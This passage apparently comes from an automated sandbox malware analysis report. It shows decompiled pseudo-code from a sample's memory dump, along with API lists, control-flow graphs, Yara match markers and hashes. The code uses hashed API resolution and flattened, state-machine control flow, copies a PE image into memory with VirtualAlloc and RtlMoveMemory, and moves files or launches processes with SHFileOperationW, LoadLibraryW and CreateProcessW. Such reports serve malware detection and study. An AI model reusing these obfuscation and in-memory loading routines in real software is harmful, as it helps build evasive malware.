				_v592 = _v592 ^ 0x00014403;
				_v588 = 0x2591;
				_t123 = 0x4a20241;
				_v588 = _v588 * 0x7d;
				_v588 = _v588 + 0x8d68;
				_v588 = _v588 + 0xffff8911;
				_v588 = _v588 * 0x6a;
				_v588 = _v588 + 0xffff93d5;
				_v588 = _v588 ^ 0x07a13cd2;
				_v580 = 0x789;
				_v580 = _v580 >> 1;
				_v580 = _v580 ^ 0xaee58af2;
				_v580 = _v580 ^ 0xaee58936;
				_t122 = _v580;
				goto L1;
				do {
					while(1) {
						L1:
						_t129 = _t123 - 0x1aed34c4;
						if(_t129 > 0) {
							break;
						}
						if(_t129 == 0) {
							_v580 = 0xa8c00;
							_v576 = 0;
							_v596 = E007AB6E0(_v580, _v576, 0x989680, 0);
							_v592 = _t119;
							_t121 = _v588 - _v564;
							_t124 = _v596;
							asm("sbb ecx, [esp+0x3c]");
							__eflags = _v584 - _v592;
							if(__eflags < 0) {
								goto L16;
							} else {
								if(__eflags > 0) {
									L29:
									return 1;
								} else {
									__eflags = _t121 - _t124;
									if(_t121 < _t124) {
										goto L16;
									} else {
										goto L29;
									}
								}
							}
						} else {
							if(_t123 == 0x12f5064) {
								_t82 =  *0x7adec0;
								__eflags = _t82;
								if(_t82 == 0) {
									_t99 = E007A3F00(0x9bab0b12);
									_t119 = 0x8b0c7279;
									_t82 = E007A3E60(_t101, _t99, 0x8b0c7279, _t126);
									 *0x7adec0 = _t82;
								}
								 *_t82(_t122, 0,  &_v564, 0x28);
								asm("sbb esi, esi");
								_t85 =  *0x7ade3c;
								_t123 = (_t123 & 0xf96a5287) + 0x13ef6fdf;
								__eflags = _t85;
								if(_t85 == 0) {
									_t98 = E007A3F00(0x9bab0b12);
									_t119 = 0x20de7595;
									_t85 = E007A3E60(_t101, _t98, 0x20de7595, _t126);
									 *0x7ade3c = _t85;
								}
								 *_t85(_t122);
								goto L15;
							} else {
								if(_t123 == 0x4a20241) {
									_t123 = 0x33602029;
									continue;
								} else {
									if(_t123 != 0xd59c266) {
										goto L15;
									} else {
										_t93 =  *0x7ae1d4;
										if(_t93 == 0) {
											_t97 = E007A3F00(0x9bab0b12);
											_t119 = 0xa229df38;
											_t93 = E007A3E60(_t101, _t97, 0xa229df38, _t126);
											 *0x7ae1d4 = _t93;
										}
										 *_t93( &_v572);
										_t123 = 0x1aed34c4;
										continue;
									}
								}
							}
						}
						L30:
					}
					__eflags = _t123 - 0x33602029;
					if(_t123 == 0x33602029) {
						_t75 =  *0x7ae3f4;
						__eflags = _t75;
						if(_t75 == 0) {
							_t100 = E007A3F00(0x9bab0b12);
							_t119 = 0x7dc9b9bb;
							_t75 = E007A3E60(_t101, _t100, 0x7dc9b9bb, _t126);
							 *0x7ae3f4 = _t75;
						}
						 *_t75(0,  &_v524, 0x104);
						_t123 = 0x3ae77736;
						goto L1;
					} else {
						__eflags = _t123 - 0x3ae77736;
						if(_t123 != 0x3ae77736) {
							goto L15;
						} else {
							__eflags =  *0x7ade04;
							if( *0x7ade04 == 0) {
								_t95 = E007A3F00(0x9bab0b12);
								_t119 = 0xb66d748a;
								 *0x7ade04 = E007A3E60(_t101, _t95, 0xb66d748a, _t126);
							}
							_t92 = CreateFileW( &_v524, _v584, _v592, 0, _v588, _v580, 0); // executed
							_t122 = _t92;
							__eflags = _t122 - 0xffffffff;
							if(_t122 == 0xffffffff) {
								break;
							} else {
								_t123 = 0x12f5064;
								goto L1;
							}
						}
					}
					goto L30;
					L15:
					__eflags = _t123 - 0x13ef6fdf;
				} while (_t123 != 0x13ef6fdf);
				L16:
				__eflags = 0;
				return 0;
				goto L30;
			}






























                                                                                0x007a8400
                                                                                0x007a8400
                                                                                0x007a8406
                                                                                0x007a840e
                                                                                0x007a8416
                                                                                0x007a841e
                                                                                0x007a8426
                                                                                0x007a842b
                                                                                0x007a8430
                                                                                0x007a8438
                                                                                0x007a8440
                                                                                0x007a8445
                                                                                0x007a844a
                                                                                0x007a8452
                                                                                0x007a845a
                                                                                0x007a8462
                                                                                0x007a846a
                                                                                0x007a8472
                                                                                0x007a847a
                                                                                0x007a8482
                                                                                0x007a8491
                                                                                0x007a8496
                                                                                0x007a849a
                                                                                0x007a84a2
                                                                                0x007a84af
                                                                                0x007a84b3
                                                                                0x007a84bb
                                                                                0x007a84c3
                                                                                0x007a84cb
                                                                                0x007a84cf
                                                                                0x007a84d7
                                                                                0x007a84df
                                                                                0x007a84df
                                                                                0x007a84e3
                                                                                0x007a84e3
                                                                                0x007a84e3
                                                                                0x007a84e3
                                                                                0x007a84e9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x007a84ef
                                                                                0x007a866e
                                                                                0x007a8676
                                                                                0x007a8696
                                                                                0x007a869a
                                                                                0x007a86a2
                                                                                0x007a86a6
                                                                                0x007a86aa
                                                                                0x007a86b2
                                                                                0x007a86b4
                                                                                0x00000000
                                                                                0x007a86ba
                                                                                0x007a86ba
                                                                                0x007a86c5
                                                                                0x007a86d1
                                                                                0x007a86bc
                                                                                0x007a86bc
                                                                                0x007a86be
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x007a86be
                                                                                0x007a86ba
                                                                                0x007a84f5
                                                                                0x007a84fb
                                                                                0x007a854a
                                                                                0x007a854f
                                                                                0x007a8551
                                                                                0x007a8558
                                                                                0x007a855d
                                                                                0x007a8564
                                                                                0x007a8569
                                                                                0x007a8569
                                                                                0x007a8578
                                                                                0x007a857c
                                                                                0x007a857e
                                                                                0x007a8589
                                                                                0x007a858f
                                                                                0x007a8591
                                                                                0x007a8598
                                                                                0x007a859d
                                                                                0x007a85a4
                                                                                0x007a85a9
                                                                                0x007a85a9
                                                                                0x007a85af
                                                                                0x00000000
                                                                                0x007a84fd
                                                                                0x007a8503
                                                                                0x007a8543
                                                                                0x00000000
                                                                                0x007a8505
                                                                                0x007a850b
                                                                                0x00000000
                                                                                0x007a8511
                                                                                0x007a8511
                                                                                0x007a8518
                                                                                0x007a851f
                                                                                0x007a8524
                                                                                0x007a852b
                                                                                0x007a8530
                                                                                0x007a8530
                                                                                0x007a853a
                                                                                0x007a853c
                                                                                0x00000000
                                                                                0x007a853c
                                                                                0x007a850b
                                                                                0x007a8503
                                                                                0x007a84fb
                                                                                0x00000000
                                                                                0x007a84ef
                                                                                0x007a85c8
                                                                                0x007a85ce
                                                                                0x007a8630
                                                                                0x007a8635
                                                                                0x007a8637
                                                                                0x007a863e
                                                                                0x007a8643
                                                                                0x007a864a
                                                                                0x007a864f
                                                                                0x007a864f
                                                                                0x007a8660
                                                                                0x007a8662
                                                                                0x00000000
                                                                                0x007a85d0
                                                                                0x007a85d0
                                                                                0x007a85d6
                                                                                0x00000000
                                                                                0x007a85d8
                                                                                0x007a85de
                                                                                0x007a85e0
                                                                                0x007a85e7
                                                                                0x007a85ec
                                                                                0x007a85fa
                                                                                0x007a85fa
                                                                                0x007a861d
                                                                                0x007a861f
                                                                                0x007a8621
                                                                                0x007a8624
                                                                                0x00000000
                                                                                0x007a8626
                                                                                0x007a8626
                                                                                0x00000000
                                                                                0x007a8626
                                                                                0x007a8624
                                                                                0x007a85d6
                                                                                0x00000000
                                                                                0x007a85b1
                                                                                0x007a85b1
                                                                                0x007a85b1
                                                                                0x007a85bd
                                                                                0x007a85bd
                                                                                0x007a85c7
                                                                                0x00000000

                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,?,3251FEFE), ref: 007A861D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2284406713.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true
                                                                                • Associated: 00000008.00000002.2284403091.00000000007A0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000008.00000002.2284418757.00000000007AD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000008.00000002.2284422950.00000000007AF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_7a0000_tmp_e473b4.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID: ) `3$) `3$6w:$6w:$=
                                                                                • API String ID: 823142352-4124229693
                                                                                • Opcode ID: b876abbfd5a86e34661ccd02b7d314e77a4bcd6c3bbdb0c1e540725a9e26ecbc
                                                                                • Instruction ID: acf2f976a21aab586166dcecfc36f0c4bda6928e08735b044fea86069a68db2c
                                                                                • Opcode Fuzzy Hash: b876abbfd5a86e34661ccd02b7d314e77a4bcd6c3bbdb0c1e540725a9e26ecbc
                                                                                • Instruction Fuzzy Hash: 9E61C271A083119FD758DF68C44962FBAE5ABD5714F008A1DF4998B290EBBCDD048F83
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00620D60, Relevance: 9.1, APIs: 6, Instructions: 124memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 658 620d60-620dd5 call 620ed0 VirtualAlloc RtlMoveMemory 662 620ddb-620dde 658->662 663 620ebe-620ec4 658->663 662->663 664 620de4-620de6 662->664 664->663 666 620dec-620df0 664->666 666->663 667 620df6-620dfd 666->667 668 620e03-620e36 call 621140 RtlMoveMemory 667->668 669 620eaf-620ebb 667->669 668->663 673 620e3c-620e4a VirtualAlloc 668->673 674 620e89-620ea0 RtlFillMemory 673->674 675 620e4c-620e52 673->675 674->663 681 620ea2-620ea5 674->681 676 620e54-620e56 675->676 677 620e5a-620e68 675->677 676->677 677->663 678 620e6a-620e7d RtlMoveMemory 677->678 678->663 680 620e7f-620e83 678->680 680->663 682 620e85 680->682 681->663 683 620ea7-620ea9 681->683 682->674 683->668 683->669
                                                                                APIs
                                                                                  • Part of subcall function 00620FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 00620F08
                                                                                  • Part of subcall function 00620FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 00620F3E
                                                                                  • Part of subcall function 00620FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 00620F7F
                                                                                • VirtualAlloc.KERNEL32(?,?,00000000,?,?), ref: 00620DB4
                                                                                • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00620DC3
                                                                                  • Part of subcall function 00621140: lstrcpynW.KERNEL32(00000000,00000000,00000000,00000010,00620EFD,00000000), ref: 00621155
                                                                                • RtlMoveMemory.NTDLL(00000000,-00000018,00000028), ref: 00620E11
                                                                                • VirtualAlloc.KERNEL32(?,?,00000000,?,?), ref: 00620E3D
                                                                                • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00620E6C
                                                                                • RtlFillMemory.KERNEL32(00000000,?,00000000), ref: 00620E98
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2284138323.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_620000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: Memory$Move$AllocVirtual$Filllstrcpyn
                                                                                • String ID:
                                                                                • API String ID: 3581289920-0
                                                                                • Opcode ID: 98a03950a6b87b5ad15d3b8fee512a0dc4eebefe5bb086351cc2e195eb997952
                                                                                • Instruction ID: 3b00e75cc41d5e1bbb98c1701ccce8ab3664b92a28348ce1565d1390c1f980c6
                                                                                • Opcode Fuzzy Hash: 98a03950a6b87b5ad15d3b8fee512a0dc4eebefe5bb086351cc2e195eb997952
                                                                                • Instruction Fuzzy Hash: 4131E771A087506BE314EB20EC44EABB3EBFBD9380F050D1CB58897352DA35D9C18B66
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 007A3780, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 102COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 684 7a3780-7a3793 685 7a37b0-7a37c5 684->685 686 7a3795-7a37ab call 7a3f00 call 7a3e60 684->686 691 7a37e2-7a37fa 685->691 692 7a37c7-7a37dd call 7a3f00 call 7a3e60 685->692 686->685 697 7a37fc-7a3812 call 7a3f00 call 7a3e60 691->697 698 7a3817-7a3832 691->698 692->691 697->698 705 7a384f-7a385e 698->705 706 7a3834-7a384a call 7a3f00 call 7a3e60 698->706 711 7a387b-7a38b4 705->711 712 7a3860-7a3876 call 7a3f00 call 7a3e60 705->712 706->705 719 7a38d1-7a38e2 SHFileOperationW 711->719 720 7a38b6-7a38cc call 7a3f00 call 7a3e60 711->720 712->711 720->719
                                                                                C-Code - Quality: 62%
                                                                                			E007A3780(void* __ecx, void* __edx, void* __edi, void* __esi) {
				char _v520;
				char _v528;
				char _v536;
				char _v1040;
				char _v1056;
				short _v1072;
				char* _v1076;
				char* _v1080;
				intOrPtr _v1084;
				intOrPtr* _t12;
				intOrPtr* _t14;
				intOrPtr* _t16;
				intOrPtr* _t18;
				intOrPtr* _t20;
				signed int _t26;
				void* _t36;
				void* _t63;
				void* _t66;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;
				struct _SHFILEOPSTRUCTW* _t73;

				_t70 =  &_v1072;
				_t12 =  *0x7addc0;
				_t66 = __ecx;
				_t63 = __edx;
				if(_t12 == 0) {
					_t12 = E007A3E60(_t36, E007A3F00(0xc6fbcd74), 0x7e0ae558, _t69);
					 *0x7addc0 = _t12;
				}
				 *_t12( &_v1072, 0, 0x1e);
				_t14 =  *0x7addc0;
				_t71 = _t70 + 0xc;
				if(_t14 == 0) {
					_t14 = E007A3E60(_t36, E007A3F00(0xc6fbcd74), 0x7e0ae558, _t69);
					 *0x7addc0 = _t14;
				}
				 *_t14( &_v1040, 0, 0x208);
				_t16 =  *0x7addc0;
				_t72 = _t71 + 0xc;
				if(_t16 == 0) {
					_t16 = E007A3E60(_t36, E007A3F00(0xc6fbcd74), 0x7e0ae558, _t69);
					 *0x7addc0 = _t16;
				}
				 *_t16( &_v520, 0, 0x208);
				_t18 =  *0x7ae298;
				_t73 = _t72 + 0xc;
				if(_t18 == 0) {
					_t18 = E007A3E60(_t36, E007A3F00(0x9bab0b12), 0xba782e65, _t69);
					 *0x7ae298 = _t18;
				}
				 *_t18( &_v1040, _t66);
				_t20 =  *0x7ae298;
				if(_t20 == 0) {
					_t20 = E007A3E60(_t36, E007A3F00(0x9bab0b12), 0xba782e65, _t69);
					 *0x7ae298 = _t20;
				}
				 *_t20( &_v528, _t63);
				_v1084 = 1;
				_v1080 =  &_v1056;
				_v1076 =  &_v536;
				_v1072 = 0xe14;
				if( *0x7ae30c == 0) {
					 *0x7ae30c = E007A3E60(_t36, E007A3F00(0xd9518805), 0x262a6194, _t69);
				}
				_t26 = SHFileOperationW(_t73); // executed
				asm("sbb eax, eax");
				return  ~_t26 + 1;
			}


























                                                                                0x007a3785
                                                                                0x007a3780
                                                                                0x007a378c
                                                                                0x007a378f
                                                                                0x007a3793
                                                                                0x007a37a6
                                                                                0x007a37ab
                                                                                0x007a37ab
                                                                                0x007a37b9
                                                                                0x007a37bb
                                                                                0x007a37c0
                                                                                0x007a37c5
                                                                                0x007a37d8
                                                                                0x007a37dd
                                                                                0x007a37dd
                                                                                0x007a37ee
                                                                                0x007a37f0
                                                                                0x007a37f5
                                                                                0x007a37fa
                                                                                0x007a380d
                                                                                0x007a3812
                                                                                0x007a3812
                                                                                0x007a3826
                                                                                0x007a3828
                                                                                0x007a382d
                                                                                0x007a3832
                                                                                0x007a3845
                                                                                0x007a384a
                                                                                0x007a384a
                                                                                0x007a3855
                                                                                0x007a3857
                                                                                0x007a385e
                                                                                0x007a3871
                                                                                0x007a3876
                                                                                0x007a3876
                                                                                0x007a3884
                                                                                0x007a388a
                                                                                0x007a3892
                                                                                0x007a389d
                                                                                0x007a38a6
                                                                                0x007a38b4
                                                                                0x007a38cc
                                                                                0x007a38cc
                                                                                0x007a38d5
                                                                                0x007a38d9
                                                                                0x007a38e2

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2284406713.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true
                                                                                • Associated: 00000008.00000002.2284403091.00000000007A0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000008.00000002.2284418757.00000000007AD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000008.00000002.2284422950.00000000007AF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_7a0000_tmp_e473b4.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileOperation
                                                                                • String ID: X~$X~$X~
                                                                                • API String ID: 3080627654-3258893172
                                                                                • Opcode ID: 18a355dd48e64fec9198b0b52f8ebdf870f2f5c3c6c293448f85f6f345bbb72d
                                                                                • Instruction ID: f24fb595fc6a1e292745ef315982d1efd8b55279bafb0c28049a36445141bbc4
                                                                                • Opcode Fuzzy Hash: 18a355dd48e64fec9198b0b52f8ebdf870f2f5c3c6c293448f85f6f345bbb72d
                                                                                • Instruction Fuzzy Hash: 9C31AD707042018BD724AF79DC0576BB6EAABC6704F008629B416CB281EB3CDE018795
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 007A7120, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 107libraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 726 7a7120 727 7a7125-7a712a 726->727 728 7a7130 727->728 729 7a71b4-7a71b9 727->729 730 7a7233-7a7248 call 7a34c0 728->730 731 7a7136-7a713b 728->731 732 7a71bb 729->732 733 7a7207-7a720c 729->733 754 7a724a-7a7260 call 7a3f00 call 7a3e60 730->754 755 7a7265-7a7278 LoadLibraryW 730->755 736 7a713d 731->736 737 7a7190-7a7195 731->737 739 7a71ee-7a7202 call 7a7080 732->739 740 7a71bd-7a71c2 732->740 734 7a720e-7a7222 call 7a7080 733->734 735 7a7227-7a722c 733->735 734->727 735->727 743 7a7232 735->743 744 7a717a-7a718e call 7a7080 736->744 745 7a713f-7a7144 736->745 737->735 742 7a719b-7a71af call 7a7080 737->742 739->727 747 7a71c4-7a71c9 740->747 748 7a71d5-7a71e9 call 7a7080 740->748 742->727 744->727 752 7a7146-7a714b 745->752 753 7a7164-7a7178 call 7a7080 745->753 747->735 756 7a71cb-7a71d0 747->756 748->727 752->735 762 7a7151-7a7162 call 7a7080 752->762 753->727 754->755 766 7a727a-7a7290 call 7a3f00 call 7a3e60 755->766 767 7a7295-7a72a0 755->767 756->727 762->727 766->767 777 7a72bd-7a72c5 767->777 778 7a72a2-7a72b8 call 7a3f00 call 7a3e60 767->778 778->777
                                                                                C-Code - Quality: 85%
                                                                                			E007A7120(void* __ebx) {
				void* _t2;
				struct HINSTANCE__* _t8;
				intOrPtr* _t9;
				intOrPtr* _t11;
				void* _t21;
				intOrPtr _t23;
				void* _t48;
				WCHAR* _t51;
				void* _t53;
				void* _t54;
				void* _t55;

				_t21 = __ebx;
				_t2 = 0x291da748;
				goto L1;
				do {
					while(1) {
						L1:
						_t54 = _t2 - 0x1a8031ec;
						if(_t54 > 0) {
							break;
						}
						if(_t54 == 0) {
							_t51 = E007A34C0(0x7ad830);
							__eflags =  *0x7add1c;
							if( *0x7add1c == 0) {
								 *0x7add1c = E007A3E60(_t21, E007A3F00(0x9bab0b12), 0xe4b28d97, _t53);
							}
							_t8 = LoadLibraryW(_t51);
							_t23 =  *0x7ae548; // 0x918118
							 *(_t23 + 0x4c) = _t8;
							_t9 =  *0x7ae494;
							__eflags = _t9;
							if(_t9 == 0) {
								_t9 = E007A3E60(_t21, E007A3F00(0x9bab0b12), 0x7facde30, _t53);
								 *0x7ae494 = _t9;
							}
							_t48 =  *_t9();
							_t11 =  *0x7adf30;
							__eflags = _t11;
							if(_t11 == 0) {
								_t11 = E007A3E60(_t21, E007A3F00(0x9bab0b12), 0x5010a54d, _t53);
								 *0x7adf30 = _t11;
							}
							return  *_t11(_t48, 0, _t51);
						} else {
							_t55 = _t2 - 0x185e9846;
							if(_t55 > 0) {
								__eflags = _t2 - 0x18843476;
								if(__eflags != 0) {
									goto L21;
								} else {
									E007A7080(_t21, 0x7ad7a0, 4, __eflags);
									_t2 = 0x2eb73d4f;
									continue;
								}
							} else {
								if(_t55 == 0) {
									E007A7080(_t21, 0x7ad8f0, 2, __eflags);
									_t2 = 0x9da2520;
									continue;
								} else {
									if(_t2 == 0x9da2520) {
										E007A7080(_t21, 0x7ad800, 3, __eflags);
										_t2 = 0x18843476;
										continue;
									} else {
										_t57 = _t2 - 0x15a7f569;
										if(_t2 != 0x15a7f569) {
											goto L21;
										} else {
											E007A7080(_t21, 0x7ad860, 0, _t57);
											_t2 = 0x39797244;
											continue;
										}
									}
								}
							}
						}
						L30:
					}
					__eflags = _t2 - 0x2eb73d4f;
					if(__eflags > 0) {
						__eflags = _t2 - 0x39797244;
						if(__eflags != 0) {
							goto L21;
						} else {
							E007A7080(_t21, 0x7ad890, 1, __eflags);
							_t2 = 0x185e9846;
							goto L1;
						}
					} else {
						if(__eflags == 0) {
							E007A7080(_t21, 0x7ad7e0, 5, __eflags);
							_t2 = 0x22a44863;
							goto L1;
						} else {
							__eflags = _t2 - 0x22a44863;
							if(__eflags == 0) {
								E007A7080(_t21, 0x7ad8c0, 6, __eflags);
								_t2 = 0x1a8031ec;
								goto L1;
							} else {
								__eflags = _t2 - 0x291da748;
								if(__eflags != 0) {
									goto L21;
								} else {
									_t2 = 0x15a7f569;
									goto L1;
								}
							}
						}
					}
					goto L30;
					L21:
					__eflags = _t2 - 0x21acdd7e;
				} while (__eflags != 0);
				return _t2;
				goto L30;
			}














                                                                                0x007a7120
                                                                                0x007a7120
                                                                                0x007a7120
                                                                                0x007a7125
                                                                                0x007a7125
                                                                                0x007a7125
                                                                                0x007a7125
                                                                                0x007a712a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x007a7130
                                                                                0x007a723f
                                                                                0x007a7246
                                                                                0x007a7248
                                                                                0x007a7260
                                                                                0x007a7260
                                                                                0x007a7266
                                                                                0x007a7268
                                                                                0x007a726e
                                                                                0x007a7271
                                                                                0x007a7276
                                                                                0x007a7278
                                                                                0x007a728b
                                                                                0x007a7290
                                                                                0x007a7290
                                                                                0x007a7297
                                                                                0x007a7299
                                                                                0x007a729e
                                                                                0x007a72a0
                                                                                0x007a72b3
                                                                                0x007a72b8
                                                                                0x007a72b8
                                                                                0x007a72c5
                                                                                0x007a7136
                                                                                0x007a7136
                                                                                0x007a713b
                                                                                0x007a7190
                                                                                0x007a7195
                                                                                0x00000000
                                                                                0x007a719b
                                                                                0x007a71a5
                                                                                0x007a71aa
                                                                                0x00000000
                                                                                0x007a71aa
                                                                                0x007a713d
                                                                                0x007a713d
                                                                                0x007a7184
                                                                                0x007a7189
                                                                                0x00000000
                                                                                0x007a713f
                                                                                0x007a7144
                                                                                0x007a716e
                                                                                0x007a7173
                                                                                0x00000000
                                                                                0x007a7146
                                                                                0x007a7146
                                                                                0x007a714b
                                                                                0x00000000
                                                                                0x007a7151
                                                                                0x007a7158
                                                                                0x007a715d
                                                                                0x00000000
                                                                                0x007a715d
                                                                                0x007a714b
                                                                                0x007a7144
                                                                                0x007a713d
                                                                                0x007a713b
                                                                                0x00000000
                                                                                0x007a7130
                                                                                0x007a71b4
                                                                                0x007a71b9
                                                                                0x007a7207
                                                                                0x007a720c
                                                                                0x00000000
                                                                                0x007a720e
                                                                                0x007a7218
                                                                                0x007a721d
                                                                                0x00000000
                                                                                0x007a721d
                                                                                0x007a71bb
                                                                                0x007a71bb
                                                                                0x007a71f8
                                                                                0x007a71fd
                                                                                0x00000000
                                                                                0x007a71bd
                                                                                0x007a71bd
                                                                                0x007a71c2
                                                                                0x007a71df
                                                                                0x007a71e4
                                                                                0x00000000
                                                                                0x007a71c4
                                                                                0x007a71c4
                                                                                0x007a71c9
                                                                                0x00000000
                                                                                0x007a71cb
                                                                                0x007a71cb
                                                                                0x00000000
                                                                                0x007a71cb
                                                                                0x007a71c9
                                                                                0x007a71c2
                                                                                0x007a71bb
                                                                                0x00000000
                                                                                0x007a7227
                                                                                0x007a7227
                                                                                0x007a7227
                                                                                0x007a7232
                                                                                0x00000000

                                                                                APIs
                                                                                • LoadLibraryW.KERNEL32(00000000,?,3251FEFE,007A68AC), ref: 007A7266
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2284406713.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true
                                                                                • Associated: 00000008.00000002.2284403091.00000000007A0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000008.00000002.2284418757.00000000007AD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000008.00000002.2284422950.00000000007AF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_7a0000_tmp_e473b4.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID: Dry9$Dry9
                                                                                • API String ID: 1029625771-121480178
                                                                                • Opcode ID: 6c3e38f00eb1b63ea0a46e95a077f7fdcda62ebc3e64f579f6160b60bf2f9a0d
                                                                                • Instruction ID: 7b9aff4a94fcb1b43bcdb119e75795d60af16d0233b758df857c15464ef4cfb2
                                                                                • Opcode Fuzzy Hash: 6c3e38f00eb1b63ea0a46e95a077f7fdcda62ebc3e64f579f6160b60bf2f9a0d
                                                                                • Instruction Fuzzy Hash: B3315C20B0D10487DA2C6BB99C9576B11AAE7E7708F204776F152CBB95ED2ECD02C3D6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 007A4B70, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87processCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 786 7a4b70-7a4b80 787 7a4b9d-7a4bba 786->787 788 7a4b82-7a4b98 call 7a3f00 call 7a3e60 786->788 792 7a4bbc-7a4bd2 call 7a3f00 call 7a3e60 787->792 793 7a4bd7-7a4bf5 CreateProcessW 787->793 788->787 792->793 797 7a4c73-7a4c7a 793->797 798 7a4bf7-7a4bfd 793->798 800 7a4bff-7a4c13 798->800 801 7a4c14-7a4c1b 798->801 803 7a4c38-7a4c45 801->803 804 7a4c1d-7a4c33 call 7a3f00 call 7a3e60 801->804 810 7a4c62-7a4c72 803->810 811 7a4c47-7a4c5d call 7a3f00 call 7a3e60 803->811 804->803 811->810
                                                                                C-Code - Quality: 60%
                                                                                			E007A4B70(void* __ebx, WCHAR* __ecx, WCHAR* __edx, void* __ebp, int _a4, intOrPtr _a12) {
				struct _STARTUPINFOW _v72;
				struct _PROCESS_INFORMATION _v88;
				intOrPtr* _t9;
				int _t12;
				intOrPtr* _t15;
				intOrPtr* _t17;
				WCHAR* _t44;
				WCHAR* _t45;

				_t46 = __ebp;
				_t26 = __ebx;
				_t9 =  *0x7addc0;
				_t45 = __edx;
				_t44 = __ecx;
				if(_t9 == 0) {
					_t9 = E007A3E60(__ebx, E007A3F00(0xc6fbcd74), 0x7e0ae558, __ebp);
					 *0x7addc0 = _t9;
				}
				 *_t9( &_v72, 0, 0x44);
				_v72.cb = 0x44;
				if( *0x7ae21c == 0) {
					 *0x7ae21c = E007A3E60(_t26, E007A3F00(0x9bab0b12), 0xbd6cc871, _t46);
				}
				_t12 = CreateProcessW(_t44, _t45, 0, 0, _a4, 0, 0, 0,  &_v72,  &_v88); // executed
				if(_t12 == 0) {
					return 0;
				} else {
					if(_a12 == 0) {
						_t15 =  *0x7ade3c;
						if(_t15 == 0) {
							_t15 = E007A3E60(_t26, E007A3F00(0x9bab0b12), 0x20de7595, _t46);
							 *0x7ade3c = _t15;
						}
						 *_t15(_v88.hProcess);
						_t17 =  *0x7ade3c;
						if(_t17 == 0) {
							_t17 = E007A3E60(_t26, E007A3F00(0x9bab0b12), 0x20de7595, _t46);
							 *0x7ade3c = _t17;
						}
						 *_t17(_v88.hProcess);
						return 1;
					} else {
						asm("movdqu xmm0, [esp+0x8]");
						asm("movdqu [eax], xmm0");
						return 1;
					}
				}
			}











                                                                                0x007a4b70
                                                                                0x007a4b70
                                                                                0x007a4b70
                                                                                0x007a4b79
                                                                                0x007a4b7c
                                                                                0x007a4b80
                                                                                0x007a4b93
                                                                                0x007a4b98
                                                                                0x007a4b98
                                                                                0x007a4ba6
                                                                                0x007a4bb0
                                                                                0x007a4bba
                                                                                0x007a4bd2
                                                                                0x007a4bd2
                                                                                0x007a4bf1
                                                                                0x007a4bf5
                                                                                0x007a4c7a
                                                                                0x007a4bf7
                                                                                0x007a4bfd
                                                                                0x007a4c14
                                                                                0x007a4c1b
                                                                                0x007a4c2e
                                                                                0x007a4c33
                                                                                0x007a4c33
                                                                                0x007a4c3c
                                                                                0x007a4c3e
                                                                                0x007a4c45
                                                                                0x007a4c58
                                                                                0x007a4c5d
                                                                                0x007a4c5d
                                                                                0x007a4c66
                                                                                0x007a4c72
                                                                                0x007a4bff
                                                                                0x007a4bff
                                                                                0x007a4c05
                                                                                0x007a4c13
                                                                                0x007a4c13
                                                                                0x007a4bfd

                                                                                APIs
                                                                                • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 007A4BF1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2284406713.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true
